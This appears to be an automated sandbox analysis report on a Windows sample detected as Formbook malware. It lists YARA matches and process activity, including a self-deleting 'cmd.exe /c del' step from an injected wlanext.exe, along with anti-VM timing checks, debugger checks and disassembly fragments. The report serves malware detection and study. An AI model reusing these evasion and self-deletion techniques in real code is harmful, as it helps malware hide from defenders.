Source: 00000003.00000002.735925804.0000000000A00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.735925804.0000000000A00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.735695212.00000000005A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.735695212.00000000005A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.735263364.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.735263364.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.eQLPRPErea.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.eQLPRPErea.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.eQLPRPErea.exe.1eb20000.5.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.eQLPRPErea.exe.1eb20000.5.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.eQLPRPErea.exe.1eb20000.5.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.eQLPRPErea.exe.1eb20000.5.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.1.eQLPRPErea.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.1.eQLPRPErea.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.1.eQLPRPErea.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.1.eQLPRPErea.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.eQLPRPErea.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.eQLPRPErea.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/3@15/12
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 1_2_00404201 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 1_2_004020A6 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6648:120:WilError_01
          Source: C:\Users\user\Desktop\eQLPRPErea.exeFile created: C:\Users\user\AppData\Local\Temp\nsq6028.tmpJump to behavior
          Source: eQLPRPErea.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\eQLPRPErea.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\eQLPRPErea.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: eQLPRPErea.exeVirustotal: Detection: 28%
          Source: eQLPRPErea.exeReversingLabs: Detection: 31%
          Source: C:\Users\user\Desktop\eQLPRPErea.exeFile read: C:\Users\user\Desktop\eQLPRPErea.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\eQLPRPErea.exe 'C:\Users\user\Desktop\eQLPRPErea.exe'
          Source: C:\Users\user\Desktop\eQLPRPErea.exeProcess created: C:\Users\user\Desktop\eQLPRPErea.exe 'C:\Users\user\Desktop\eQLPRPErea.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\eQLPRPErea.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\eQLPRPErea.exeProcess created: C:\Users\user\Desktop\eQLPRPErea.exe 'C:\Users\user\Desktop\eQLPRPErea.exe'
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\eQLPRPErea.exe'
          Source: C:\Users\user\Desktop\eQLPRPErea.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000002.964029723.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: eQLPRPErea.exe, 00000001.00000003.692305861.000000001ECE0000.00000004.00000001.sdmp, eQLPRPErea.exe, 00000003.00000002.736314312.0000000000B5F000.00000040.00000001.sdmp, wlanext.exe, 00000009.00000002.955250714.000000000317F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: eQLPRPErea.exe, wlanext.exe
          Source: Binary string: wlanext.pdb source: eQLPRPErea.exe, 00000003.00000002.736943919.00000000026B0000.00000040.00000001.sdmp
          Source: Binary string: wlanext.pdbGCTL source: eQLPRPErea.exe, 00000003.00000002.736943919.00000000026B0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000002.964029723.0000000005A00000.00000002.00000001.sdmp

          Data Obfuscation:

          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Unpacked PE file: 3.2.eQLPRPErea.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 1_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00416090 push edi; ret
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00407101 push cs; iretd
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00416104 push ds; retf
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_0041CA5A pushfd ; retf
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_004162ED push es; iretd
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_0041B3C5 push eax; ret
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_0041B47C push eax; ret
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_0041B412 push eax; ret
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_0041B41B push eax; ret
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00415EC4 push edx; ret
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00415FA8 push esp; iretd
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00ABD0D1 push ecx; ret
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_1_00416090 push edi; ret
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_1_00407101 push cs; iretd
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_1_00416104 push ds; retf
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_1_0041CA5A pushfd ; retf
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_1_004162ED push es; iretd
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_1_0041B3C5 push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030DD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_00866090 push edi; ret
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_00866104 push ds; retf
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_00857101 push cs; iretd
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_008662ED push es; iretd
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0086CA5A pushfd ; retf
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0086B3C5 push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0086B412 push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0086B41B push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0086B47C push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_00865EC4 push edx; ret
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_00865FA8 push esp; iretd
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | File created: C:\Users\user\AppData\Local\Temp\nsl6058.tmp\e4utfxiuc.dll
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wlanext.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | RDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exe | RDTSC instruction interceptor: First address: 00000000008585F4 second address: 00000000008585FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exe | RDTSC instruction interceptor: First address: 000000000085898E second address: 0000000000858994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_004088C0 rdtsc
          Source: C:\Windows\explorer.exe TID: 5480 | Thread sleep time: -70000s >= -30000s
          Source: C:\Windows\SysWOW64\wlanext.exe TID: 6908 | Thread sleep time: -48000s >= -30000s
          Source: C:\Windows\explorer.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\wlanext.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\wlanext.exe | Last function: Thread delayed
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 1_2_0040531D DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 1_2_00405CB0 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 1_2_004026BC FindFirstFileA,
          Source: explorer.exe, 00000005.00000000.709265764.0000000004710000.00000004.00000001.sdmp | Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.716490018.000000000A9A6000.00000004.00000001.sdmp | Binary or memory string: 00#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&g
          Source: explorer.exe, 00000005.00000000.712230264.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000005.00000000.715679720.000000000A60E000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.712630114.0000000006650000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.715679720.000000000A60E000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000002.961888958.0000000004710000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000005.00000000.712230264.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000005.00000000.715995251.000000000A716000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000005.00000000.712230264.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000005.00000000.716085143.000000000A784000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: explorer.exe, 00000005.00000000.712230264.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\wlanext.exe | Process queried: DebugPort
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_004088C0 rdtsc
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00409B30 LdrLoadDll,
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 1_2_6FC61000 YVfgfgfgfgfg,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 1_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 1_2_0291187F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 1_2_02911667 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AA90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A9F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A9F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A9F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A69080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AE3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AE3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A658EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AFB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AFB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AFB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AFB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AFB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AFB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A9002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A9002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A9002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A9002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A9002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A7B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A7B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A7B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A7B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00B34015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00B34015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AE7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AE7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AE7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00B22073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00B31074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A80050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A80050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AE69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A961A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A961A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AE51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AE51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AE51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AE51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A8C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A9A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A92990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A6B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A6B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A6B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AF41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A84120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A84120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A84120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A84120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A84120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A9513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A9513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A69100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A69100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A69100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A6C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A6B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A6B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A8B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A8B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A652A5 mov eax, dword ptr fs:[00000030h]
